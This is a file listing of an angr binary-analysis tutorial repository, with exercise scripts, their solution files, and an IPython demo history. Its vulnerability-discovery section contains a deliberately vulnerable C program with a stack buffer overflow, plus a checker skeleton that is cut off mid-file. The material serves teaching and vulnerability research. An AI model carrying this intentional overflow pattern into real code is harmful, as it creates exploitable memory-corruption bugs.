├── README.md ├── cfg_accurate ├── 0.py ├── 0.solution.py ├── 1.py ├── 1.solution.py └── fauxware ├── cfg_fast ├── 0.py ├── 0.solution.py ├── 1.py ├── 1.solution.py ├── cfg_2 └── fauxware ├── ddg ├── 0.py ├── 0.solution.py └── fauxware ├── ipython_history.txt ├── vfg ├── 0.py ├── 0.solution.py └── fauxware ├── vuln_discovery ├── overflow ├── overflow.c ├── vuln.py └── vuln.solution.py ├── vuln_discovery_2 ├── overflow3-28d8a442fb232c0c ├── overflow3-28d8a442fb232c0c.c ├── overflow3.py └── overflow3.solution.py └── vuln_discovery_simple ├── overflow3-simplified ├── overflow3-simplified.c ├── overflow3.py └── overflow3.solution.py /README.md: -------------------------------------------------------------------------------- 1 | 2 | # SecDev angr Tutorial 3 | 4 | The slides are [here](https://goo.gl/YHdmDB). 5 | -------------------------------------------------------------------------------- /cfg_accurate/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states. 5 | ''' 6 | 7 | import angr 8 | 9 | # load the binary 10 | project = angr.Project("fauxware") 11 | 12 | # WRITEME: generate an accurate CFG 13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True' 14 | cfg = None 15 | 16 | # Alright, we got it! 17 | if cfg is not None: 18 | all_nodes = cfg.nodes() 19 | 20 | for n in all_nodes: 21 | print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx)) 22 | 23 | -------------------------------------------------------------------------------- /cfg_accurate/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states. 
5 | ''' 6 | 7 | import angr 8 | 9 | # load the binary 10 | project = angr.Project("fauxware") 11 | 12 | # WRITEME: generate an accurate CFG 13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True' 14 | cfg = project.analyses.CFGAccurate(keep_state=True) 15 | 16 | # Alright, we got it! 17 | if cfg is not None: 18 | all_nodes = cfg.nodes() 19 | 20 | for n in all_nodes: 21 | print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx)) 22 | 23 | -------------------------------------------------------------------------------- /cfg_accurate/1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Demonstrate how to normalize a CFG 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the binary 12 | project = angr.Project('fauxware') 13 | 14 | # WRITEME: to generate a normalized CFG, simply specify `normalize=True` during initialization 15 | cfg_norm = None 16 | 17 | # this is a normal CFG 18 | cfg = project.analyses.CFG() 19 | 20 | # There should be some different nodes 21 | if cfg_norm is not None: 22 | nodes_norm = cfg_norm.nodes() 23 | nodes = cfg.nodes() 24 | 25 | nodes_only_in_normalized = set() 26 | 27 | for n in nodes_norm: 28 | if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]): 29 | continue 30 | nodes_only_in_normalized.add(n) 31 | 32 | assert nodes_only_in_normalized 33 | pprint(nodes_only_in_normalized) 34 | 35 | -------------------------------------------------------------------------------- /cfg_accurate/1.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | Demonstrate how to normalize a CFG 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the binary 12 | project = angr.Project('fauxware') 13 | 14 | # WRITEME: to generate a 
normalized CFG, simply specify `normalize=True` during initialization 15 | cfg_norm = project.analyses.CFG(normalize=True) 16 | 17 | # this is a normal CFG 18 | cfg = project.analyses.CFG() 19 | 20 | # There should be some different nodes 21 | if cfg_norm is not None: 22 | nodes_norm = cfg_norm.nodes() 23 | nodes = cfg.nodes() 24 | 25 | nodes_only_in_normalized = set() 26 | 27 | for n in nodes_norm: 28 | if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]): 29 | continue 30 | nodes_only_in_normalized.add(n) 31 | 32 | assert nodes_only_in_normalized 33 | pprint(nodes_only_in_normalized) 34 | 35 | -------------------------------------------------------------------------------- /cfg_accurate/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_accurate/fauxware -------------------------------------------------------------------------------- /cfg_fast/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | project = angr.Project("fauxware") 8 | 9 | # WRITEME: generate a CFG 10 | cfg = None 11 | 12 | # WRITEME: print out all nodes 13 | all_nodes = None 14 | pprint(all_nodes) 15 | 16 | # WRITEME: get any CFG node whose address is 0x80485fc 17 | # 0x80485fc is the address of main() 18 | node = None 19 | print("Node 0x80485fc: %s" % node) 20 | 21 | # WRITEME: get all CFG node whose address is 0x80485fc 22 | node_list = None 23 | print("All node whose address is 0x80485fc: %s" % node_list) 24 | 25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG 26 | successors = None 27 | print("All successors to node %s are:" % node) 28 | pprint(successors) 29 | 30 | # WRITEME: get a list of successors of that node, using the `successor` property from the CFG 
node itself 31 | # this time it does not include the fakeret target 32 | successors = None 33 | print("All successors to node %s are:" % node) 34 | pprint(successors) 35 | 36 | -------------------------------------------------------------------------------- /cfg_fast/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | project = angr.Project("fauxware") 8 | 9 | # WRITEME: generate a CFG 10 | cfg = project.analyses.CFG() 11 | 12 | # WRITEME: print out all nodes 13 | all_nodes = cfg.nodes() 14 | pprint(all_nodes) 15 | 16 | # WRITEME: get any CFG node whose address is 0x80485fc 17 | # 0x80485fc is the address of main() 18 | node = cfg.get_any_node(0x80485fc) 19 | print("Node 0x80485fc: %s" % node) 20 | 21 | # WRITEME: get all CFG node whose address is 0x80485fc 22 | node_list = cfg.get_all_nodes(0x80485fc) 23 | print("All node whose address is 0x80485fc: %s" % node_list) 24 | 25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG 26 | successors = cfg.get_successors(node, excluding_fakeret=False) 27 | print("All successors to node %s are:" % node) 28 | pprint(successors) 29 | 30 | # WRITEME: get a list of successors of that node, using the `successor` property from the CFG node itself 31 | # this time it does not include the fakeret target 32 | successors = node.successors 33 | print("All successors to node %s are:" % node) 34 | pprint(successors) 35 | 36 | -------------------------------------------------------------------------------- /cfg_fast/1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | p = angr.Project("cfg_2") 8 | 9 | # WRITEME: generate a CFG that collects data references during CFG recovery 10 | # Note that by default it resolves indirect jumps 
(like jump tables) 11 | cfg = None 12 | 13 | # WRITEME: print out the recovered indirect jumps 14 | indirect_jumps = None 15 | print("Here are all indirect jumps from the binary:") 16 | pprint(indirect_jumps) 17 | 18 | # WRITEME: print out the recovered list of memory data 19 | memory_data = None 20 | print("Here are all recovered memory data from the binary:") 21 | pprint(memory_data) 22 | 23 | # WRITEME: print out the reversed map between instruction addresses to memory data 24 | ins_to_memdata = None 25 | print("Here is a mapping between instruction address and memory data:") 26 | pprint(ins_to_memdata) 27 | 28 | -------------------------------------------------------------------------------- /cfg_fast/1.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pprint import pprint 4 | 5 | import angr 6 | 7 | p = angr.Project("cfg_2") 8 | 9 | # WRITEME: generate a CFG that collects data references during CFG recovery 10 | # Note that by default it resolves indirect jumps (like jump tables) 11 | cfg = p.analyses.CFG(collect_data_references=True) 12 | 13 | # WRITEME: print out the recovered indirect jumps 14 | indirect_jumps = cfg.indirect_jumps 15 | print("Here are all indirect jumps from the binary:") 16 | pprint(indirect_jumps) 17 | 18 | # WRITEME: print out the recovered list of memory data 19 | memory_data = cfg.memory_data 20 | print("Here are all recovered memory data from the binary:") 21 | pprint(memory_data) 22 | 23 | # WRITEME: print out the reversed map between instruction addresses to memory data 24 | ins_to_memdata = cfg._insn_addr_to_memory_data 25 | print("Here is a mapping between instruction address and memory data:") 26 | pprint(ins_to_memdata) 27 | 28 | -------------------------------------------------------------------------------- /cfg_fast/cfg_2: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/cfg_2 -------------------------------------------------------------------------------- /cfg_fast/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/fauxware -------------------------------------------------------------------------------- /ddg/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the project 12 | 13 | p = angr.Project("fauxware") 14 | 15 | # WRITEME: get the address of function `authenticate` 16 | cfg_fast = None 17 | main_func = None 18 | auth_func = None 19 | 20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis 21 | # we don't want to mess with the default (project-level) knowledge base 22 | # this is just a good habit :-) 23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin) 24 | 25 | # WRITEME: generate an accurate CFG 26 | # Recommended parameters: 27 | # starts=(main_func.addr,) 28 | # context_sensitivity_level=2 29 | # keep_state=True # states must be kept and stored to allow dependence analysis later 30 | cfg = None 31 | 32 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base, and specify the `start` 33 | ddg = None 34 | 35 | if ddg is not None: 36 | # YES it's done!
Let's see what's there 37 | print("=== Statement Dependence Graph ===") 38 | print("Edges:") 39 | edges = ddg.graph.edges(data=True) 40 | pprint(edges, width=120) 41 | 42 | print("=== Data Dependence Graph ===") 43 | print("Edges:") 44 | edges = ddg.data_graph.edges(data=True) 45 | pprint(edges, width=120) 46 | 47 | print("=== Simplified Data Dependence Graph ===") 48 | print("Edges:") 49 | edges = ddg.simplified_data_graph.edges(data=True) 50 | pprint(edges, width=120) 51 | 52 | -------------------------------------------------------------------------------- /ddg/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate 5 | ''' 6 | 7 | from pprint import pprint 8 | 9 | import angr 10 | 11 | # load the project 12 | 13 | p = angr.Project("fauxware") 14 | 15 | # WRITEME: get the address of function `authenticate` 16 | cfg_fast = p.analyses.CFG() 17 | main_func = p.kb.functions.function(name='main') 18 | auth_func = p.kb.functions.function(name='authenticate') 19 | 20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis 21 | # we don't want to mess with the default (project-level) knowledge base 22 | # this is just a good habit :-) 23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin) 24 | 25 | # WRITEME: generate an accurate CFG 26 | # Recommended parameters: 27 | # starts=(main_func.addr,) 28 | # context_sensitivity_level=2 29 | # keep_state=True # states must be kept and stored to allow dependence analysis later 30 | cfg = p.analyses.CFGAccurate(starts=(main_func.addr,), 31 | context_sensitivity_level=2, 32 | keep_state=True 33 | ) 34 | 35 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base 36 | ddg = p.analyses.DDG(cfg=cfg, start=auth_func.addr, kb=kb) 37 | 38 | if ddg is not None: 39 | # YES it's done!
Let's see what's there 40 | print("=== Statement Dependence Graph ===") 41 | print("Edges:") 42 | edges = ddg.graph.edges(data=True) 43 | pprint(edges, width=120) 44 | 45 | print("=== Data Dependence Graph ===") 46 | print("Edges:") 47 | edges = ddg.data_graph.edges(data=True) 48 | pprint(edges, width=120) 49 | 50 | print("=== Simplified Data Dependence Graph ===") 51 | print("Edges:") 52 | edges = ddg.simplified_data_graph.edges(data=True) 53 | pprint(edges, width=120) 54 | 55 | -------------------------------------------------------------------------------- /ddg/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/ddg/fauxware -------------------------------------------------------------------------------- /ipython_history.txt: -------------------------------------------------------------------------------- 1 | 2 | # Captured on Windows 10 with Python 2.7.11 + IPython 5.1.0 3 | 4 | # This is the beginning of IPython history 5 | import angr 6 | 7 | # Load the fauxware project 8 | project = angr.Project("fauxware/fauxware") 9 | project.loader.main_bin 10 | project.loader.main_object 11 | project.loader.all_objects 12 | project.loader.main_object.imports 13 | project.loader.main_object.sections 14 | type(project.loader.main_object.sections) 15 | project.loader.main_object.sections 16 | project.loader.main_object.sections.raw_list 17 | 18 | winproject = angr.Project("C:/Windows/System32/notepad.exe") # it took a long time and did not finish, Yan had to ctrl-c it.
19 | 20 | winproject = angr.Project("C:/Windows/System32/notepad.exe", auto_load_libs=False) # this finished very quickly 21 | winproject.loader.missing_dependencies 22 | winproject.loader.all_objects 23 | winproject.loader.main_object.imports 24 | winproject.loader.main_object.sections 25 | winproject.loader.main_object.sections.raw_list 26 | cfg = winproject.analyses.CFG() 27 | cfg = winproject.analyses.CFG(show_progressbar=True) 28 | len(cfg.nodes()) 29 | cfg.nodes() 30 | cfg.graph 31 | cfg.graph.edges() 32 | winproject.kb 33 | winproject.kb.callgraph 34 | winproject.kb.callgraph.edges() 35 | [ map(hex, x) for x in winproject.kb.callgraph.edges() ] 36 | 37 | history # Yan was demonstrating the "history" command in IPython 38 | 39 | winproject.kb 40 | winproject.kb.functions 41 | winproject.kb.functions[project.entry] 42 | winproject.kb.functions[winproject.entry] 43 | entry_function = winproject.kb.functions[winproject.entry] 44 | entry_function.graph 45 | entry_function.graph.edges() 46 | entry_function.blocks 47 | list(entry_function.blocks) 48 | entry_function.code_constants 49 | 50 | # Print out all blocks 51 | for block in entry_function.blocks: print block 52 | 53 | # Print out the disassembly of all blocks 54 | for block in entry_function.blocks: block.pp() 55 | 56 | # Print the VEX IR of all blocks 57 | for block in entry_function.blocks: block.vex.pp() 58 | 59 | block = winproject.factory.block(0x14001957e) 60 | block.pp() 61 | simgr = winproject.factory.simulation_manager() 62 | simgr 63 | simgr.active[0] 64 | simgr.active[0].regs.rax 65 | simgr.active[0].regs.rcx 66 | simgr.step() 67 | simgr.step() 68 | simgr.step() 69 | simgr.active[0] 70 | simgr.step() 71 | simgr.active[0] 72 | cfg.get_any_node(0x141000730) 73 | cfg 74 | 75 | simgr = project.factory.simulation_manager() 76 | cfg = project.analyses.CFG(show_progressbar=True) 77 | 78 | simgr.step() 79 | simgr.active[0] 80 | simgr.step() 81 | simgr.active[0] 82 | cfg.get_any_node(0x400540) 83 | 
cfg.get_any_node(0x400540).successors 84 | simgr.step(until=lamda sm: len(sm.active) != 1) 85 | simgr.step(until=lambda sm: len(sm.active) != 1) 86 | simgr.active 87 | simgr.active[0].history 88 | simgr.active[0].history.bbl_addrs 89 | list(simgr.active[0].history.bbl_addrs) 90 | map(hex, list(simgr.active[0].history.bbl_addrs)) 91 | project.loader.describe_addr(0x1000020) 92 | map(hex, list(simgr.active[0].history.descriptions)) 93 | maplist(simgr.active[0].history.descriptions) 94 | list(simgr.active[0].history.descriptions) 95 | 96 | cfg.get_any_node(0x40068e) 97 | cfg.get_any_node(0x40068e).successors 98 | state = simgr.active[0] 99 | 100 | state.history 101 | state.history.actions 102 | list(state.history.actions) 103 | list(state.history.guards) 104 | list(state.history.jump_guards) 105 | list(simgr.active[0].history.jump_guards) 106 | list(simgr.active[1].history.jump_guards) 107 | 108 | simgr.active[0].rax 109 | simgr.active[0].regs.rax 110 | simgr.active[1].regs.rax 111 | state.memory.load(state.regs.rsp, 8) 112 | state.memory.load(state.regs.rsp, 8, endness="Iend_LE") 113 | 114 | state.posix.files 115 | stdin = state.posix.files[0] 116 | stdin.all_bytes() 117 | state.solver.eval(state.posix.files[0]) 118 | state.solver.eval(state.posix.files[0].all_bytes()) 119 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str) 120 | state = simgr.active[1] 121 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str) 122 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str) 123 | stdin = state.posix.files[0] 124 | state = simgr.active[0] 125 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str) 126 | state.posix.files[0] 127 | stdin.read_from 128 | stdin.read_from? 129 | stdin.read_pos? 130 | stdin.read? 
131 | stdin.contents 132 | stdin.content 133 | stdin.content.load(10, 8) 134 | state.solver.eval_upto(stdin.content.load(9, 8), 10, cast_to=str) 135 | simgr.active 136 | simgr.mp_active 137 | simgr.mp_active.regs.rax 138 | simgr.mp_active.regs.rax.mp_items 139 | simgr.mp_active.solver.eval_upto(simgr.mp_active.files[0].content.load(9, 8), 1, cast_to=str) 140 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str) 141 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str).mp_items 142 | state.history.jump_guard 143 | 144 | state.history.jump_guard.op 145 | state.history.jump_guard.args 146 | state.history.jump_guard.args 147 | state.history.jump_guard.args[0] 148 | state.history.jump_guard.args[0] 149 | state.history.jump_guard.args[0] + 0 150 | simgr.run() 151 | 152 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items 153 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items 154 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[1].all_bytes(), 2, cast_to=str).mp_items 155 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[1].all_bytes(), 2, cast_to=str).mp_items 156 | simgr.mp_deadended.posix.files 157 | simgr.mp_deadended.posix.files.mp_items 158 | simgr.mp_deadended.solver.constraints 159 | simgr.mp_deadended.solver.jump_guards.mp_map(list) 160 | simgr.mp_deadended.history.jump_guards.mp_map(list) 161 | simgr.mp_deadended.history.jump_guards.mp_map(list).mp_items 162 | simgr = project.factory.simulation_manager() 163 | simgr 164 | 165 | cfg.functions 166 | cfg.functions.keys() 167 | project.loader.main_object.symbols_by_addr 168 | project.kb.functions['accepted'] 169 | 170 | simgr.explore(find=project.kb.functions['accepted'].addr) 171 | simgr.found 172 | simgr.found.posix.dumps(0) 173 | simgr.found[0].posix.dumps(0) 174 | 
simgr = project.factory.simulation_manager() 175 | simgr 176 | 177 | simgr.use_technique(angr.exploration_techniques.DFS()) 178 | # Use the DFS exploration technique 179 | simgr._hooks_all 180 | simgr.step() 181 | simgr.step() 182 | simgr.step() 183 | simgr.step() 184 | simgr.step() 185 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes) 186 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes) 187 | simgr.step(until=lambda sm: 'deferred' in sm.stashes) 188 | sm.deferred 189 | simgr.step(until=lambda sm: len(sm.deferred) != 0) 190 | simgr.step() 191 | simgr.step() 192 | simgr.step(until=lambda sm: len(sm.deferred) != 0) 193 | simgr.step() 194 | simgr.step() 195 | simgr.step() 196 | simgr.step() 197 | simgr.step() 198 | simgr.step() 199 | simgr.step() 200 | simgr.step() 201 | simgr.step() 202 | simgr.step() 203 | simgr.step() 204 | simgr.step() 205 | simgr.step() 206 | simgr.step() 207 | simgr.step() 208 | simgr.step() 209 | simgr.step() 210 | simgr.step() 211 | simgr.step() 212 | simgr.step() 213 | simgr.step() 214 | simgr.step() 215 | simgr.step() 216 | simgr.step() 217 | simgr.step() 218 | simgr.step() 219 | simgr.step() 220 | simgr.step() 221 | simgr.step() 222 | simgr.step() 223 | simgr.step() 224 | simgr.step() 225 | simgr.step() 226 | simgr.step() 227 | simgr.step() 228 | simgr.step() 229 | simgr.step() 230 | simgr.step() 231 | simgr.step() 232 | simgr.step() 233 | simgr.step() 234 | simgr.step() 235 | def always_succeed(state): state.regs.rax = 1 236 | project.hook? 
237 | project.hook(0x4007b9, always_succeed, length=0) 238 | 239 | simgr = project.factory.simulation_manager() 240 | simgr.run() 241 | simgr.mp_deadended 242 | simgr.mp_deadended.posix.dumps(1) 243 | simgr.mp_deadended.posix.dumps(1).mp_items 244 | class Return0(angr.SimProcedure): def run(state): return 0 245 | class Return0(angr.SimProcedure): 246 | def run(self, state): 247 | return 0 248 | project = angr.Project("fauxware/fauxware") 249 | project.hook(0x400664, Return0) 250 | project.hook(0x400664, Return0()) 251 | project.hook(0x400664, Return0(), replace=True) 252 | simgr = project.factory.simulation_manager() 253 | simgr.run() 254 | simgr.deadended[0].posix.dumps(1) 255 | simgr.deadended[0].posix.dumps(0) 256 | simgr.deadended[0].posix.dumps(1) 257 | simgr = winproject.factory.simulation_manager() 258 | simgr.step(n=10) 259 | simgr = winproject.factory.simulation_manager() 260 | simgr.step() 261 | simgr.step() 262 | simgr.step() 263 | simgr.step() 264 | simgr.step() 265 | simgr.step() 266 | simgr.step() 267 | simgr.step() 268 | simgr.step() 269 | simgr.step() 270 | simgr.step() 271 | debug 272 | 273 | project = angr.Project("f:/angr/angr-doc/examples/whitehat_crypto400/whitehat_crypto400") 274 | project.loader.main_object 275 | project.loader.main_object.symbols_by_addr 276 | project.loader.main_object.imports 277 | project.loader.main_object 278 | project.loader.all_objects 279 | 280 | simgr = project.factory.simulation_manager() 281 | simgr.step(until=lambda sm=len(sm.active) >= 10) 282 | simgr.step(until=lambda sm:len(sm.active) >= 10) 283 | simgr.step(until=lambda sm:len(sm.active) >= 20) 284 | simgr.step(until=lambda sm:len(sm.active) >=100) 285 | simgr 286 | 287 | simgr.step(until=lambda sm:len(sm.active) >= 100) 288 | 289 | # Use DFS instead of BFS for symbolic exploration 290 | simgr.use_technique(angr.exploration_techniques.DFS()) 291 | simgr.step() 292 | simgr.step() 293 | simgr.step() 294 | simgr.step() 295 | simgr.step() 296 | simgr.step() 297 | 
simgr.step() 298 | simgr.step() 299 | simgr.step() 300 | simgr.step() 301 | simgr.step() 302 | simgr.step() 303 | simgr.step() 304 | simgr.step() 305 | simgr.step() 306 | simgr.step() 307 | simgr.step() 308 | simgr.step(n=10) 309 | simgr.step(n=10) 310 | simgr.step(n=10) 311 | simgr.step(n=10) 312 | simgr.step(n=10) 313 | simgr.step(n=100) 314 | simgr.step(n=100) 315 | 316 | project 317 | project.kb 318 | project.kb.functions 319 | project.kb.functions.keys() 320 | cfg = project.analyses.CFG() 321 | project = angr.Project("fauxware/fauxware") 322 | cfg = project.analyses.CFG() 323 | project.kb.functions 324 | project.kb.functions.keys() 325 | project.kb.functions.values() 326 | project.kb.functions.values()[0] 327 | func = project.kb.functions.values()[0] 328 | func.name 329 | func.addr 330 | func.graph -------------------------------------------------------------------------------- /vfg/0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to understand the stack layout of the main function by performing generating a VFG on it. 5 | ''' 6 | 7 | from pprint import pprint 8 | from collections import defaultdict 9 | 10 | import angr 11 | 12 | 13 | # create the project 14 | project = angr.Project("fauxware") 15 | 16 | # WRITEME: generate a CFG first so we have access to all functions 17 | cfg = None 18 | 19 | # WRITEME: get the address of the main function 20 | main_func = None 21 | 22 | # WRITEME: run VFG on it 23 | # Here is the suggested parameter setup 24 | # context_sensitivity_level: 3 25 | # interfunction_level: 3 26 | vfg = None 27 | print("VFG analysis is over. 
We have some nodes now:") 28 | if vfg is not None: 29 | pprint(vfg.graph.nodes()) 30 | 31 | # WRITEME: get the input state to the very last basic block 32 | # the very last basic block in the main function is 0x80486e8 33 | # it should have captured all previous effects 34 | last_node = None 35 | last_state = None 36 | 37 | # WRITEME: Get the memory object. 38 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory) 39 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory) 40 | memory = None 41 | print("Program memory of the very last state: %s" % memory) 42 | 43 | # WRITEME: Let's take a look at the regions 44 | regions = None 45 | print("All memory regions on the stack:") 46 | pprint(regions) 47 | 48 | if regions is not None: 49 | # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region 50 | main_func_region = None 51 | alocs = None 52 | 53 | print("Abstract locations of the main procedure are:") 54 | pprint(alocs) 55 | 56 | # WRITEME: Derive stack layout information from abstract locations 57 | # you may dig a little bit into the source code of SimuVEX and claripy to see what members an aloc has. 58 | # the related code is in abstract_memory.py in SimuVEX and the vsa subpackage in claripy. 59 | # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets.
60 | # what we want is a list of stack offset and size of the corresponding memory access 61 | # let's do it here 62 | 63 | stack_layout = defaultdict(set) # map offset to size 64 | 65 | # WRITEME: traverse alocs 66 | 67 | print("The stack layout looks like:") 68 | for offset in sorted(stack_layout.keys(), reverse=True): 69 | print("%#x %s" % (offset, stack_layout[offset])) 70 | 71 | -------------------------------------------------------------------------------- /vfg/0.solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | ''' 4 | We'd like to understand the stack layout of the main function by generating a VFG on it. 5 | ''' 6 | 7 | from pprint import pprint 8 | from collections import defaultdict 9 | 10 | import angr 11 | 12 | 13 | # create the project 14 | project = angr.Project("fauxware") 15 | 16 | # WRITEME: generate a CFG first so we have access to all functions 17 | cfg = project.analyses.CFG() 18 | 19 | # WRITEME: get the address of the main function 20 | main_func = project.kb.functions.function(name='main') 21 | 22 | # WRITEME: run VFG on it 23 | # Here is the suggested parameter setup 24 | # context_sensitivity_level: 3 25 | # interfunction_level: 3 26 | vfg = project.analyses.VFG(start=main_func.addr, 27 | context_sensitivity_level=3, 28 | interfunction_level=3 29 | ) 30 | print("VFG analysis is over. We have some nodes now:") 31 | pprint(vfg.graph.nodes()) 32 | 33 | # WRITEME: get the input state to the very last basic block 34 | # the very last basic block in the main function is 0x80486e8 35 | # it should have captured all previous effects 36 | last_node = vfg.get_any_node(0x80486e8) 37 | last_state = last_node.state 38 | 39 | # WRITEME: Get the memory object.
40 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory) 41 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory) 42 | memory = last_state.memory 43 | print("Program memory of the very last state: %s" % memory) 44 | 45 | # WRITEME: Let's take a look at the regions 46 | regions = memory.regions 47 | print("All memory regions on the stack:") 48 | pprint(regions) 49 | 50 | if regions is not None: 51 | # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region 52 | main_func_region = regions.get('stack_%#x' % main_func.addr) 53 | alocs = main_func_region.alocs 54 | 55 | print("Abstract locations of the main procedure are:") 56 | pprint(alocs) 57 | 58 | # WRITEME: Derive stack layout information from abstract locations 59 | # you may dig a little bit into the source code of SimuVEX and claripy to see what members an aloc has. 60 | # the related code is in abstract_memory.py in SimuVEX and the vsa subpackage in claripy. 61 | # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets.
62 | # what we want is a list of stack offset and size of the corresponding memory access 63 | # let's do it here 64 | 65 | stack_layout = defaultdict(set) # map offset to size 66 | for aloc in alocs.values(): 67 | for segment in aloc._segment_list: 68 | stack_layout[segment.offset].add(segment.size) 69 | 70 | print("The stack layout looks like:") 71 | for offset in sorted(stack_layout.keys(), reverse=True): 72 | print("%#x %s" % (offset, stack_layout[offset])) 73 | 74 | -------------------------------------------------------------------------------- /vfg/fauxware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vfg/fauxware -------------------------------------------------------------------------------- /vuln_discovery/overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery/overflow -------------------------------------------------------------------------------- /vuln_discovery/overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | char buf[128]; 7 | unsigned char size; 8 | 9 | printf("How much to read? "); 10 | scanf("%hhd\n", &size); 11 | 12 | if (size > 128) printf("Uh oh, reading up to %d bytes...\n", size); 13 | printf("Received: %d bytes.\n", fread(buf, 1, size, stdin)); 14 | } 15 | -------------------------------------------------------------------------------- /vuln_discovery/vuln.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | # load the binary 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False }) 5 | 6 | # Make a simple security checker that checks for an overflow into the return address. 
There are several cases: 7 | # 8 | # 1. The return address is unchanged and pointing to an internal angr hook (i.e., __libc_start_main) 9 | # 2. The return address is unchanged and pointing inside the program (normal case) 10 | # 3. The return address has been overflowed, and we can point it outside of the program (we'll check for this) 11 | # 4. The return address has been partially overflowed, and still points inside the program (future work) 12 | def state_vuln_filter(state): 13 | # get the saved instruction pointer from the stack 14 | pass 15 | print "Checking saved EIP:", saved_eip 16 | 17 | # first, check if the return address points to a hook. If this is intact, then we assume there is no overflow 18 | pass 19 | 20 | # next, create constraints representing an unsafe condition. In this case, 21 | # let's check if the return address can point *outside* of the program. 22 | pass 23 | 24 | # check if the state is satisfiable with these conditions, and return True if it is 25 | pass 26 | 27 | # get a new simulation manager from the project factory 28 | simgr = project.factory.simgr() 29 | 30 | # initiate a "vuln" stash 31 | simgr.stashes['vuln'] = [ ] 32 | 33 | # the starting state has no return address on the stack, so it will trigger our vuln filter. 34 | # We can step it until it no longer triggers the filter before starting the actual analysis. 35 | print "Initializing initial state..." 36 | while state_vuln_filter(simgr.active[0]): 37 | simgr.step() 38 | 39 | # Now that we are all set up, let's loop until a vulnerable 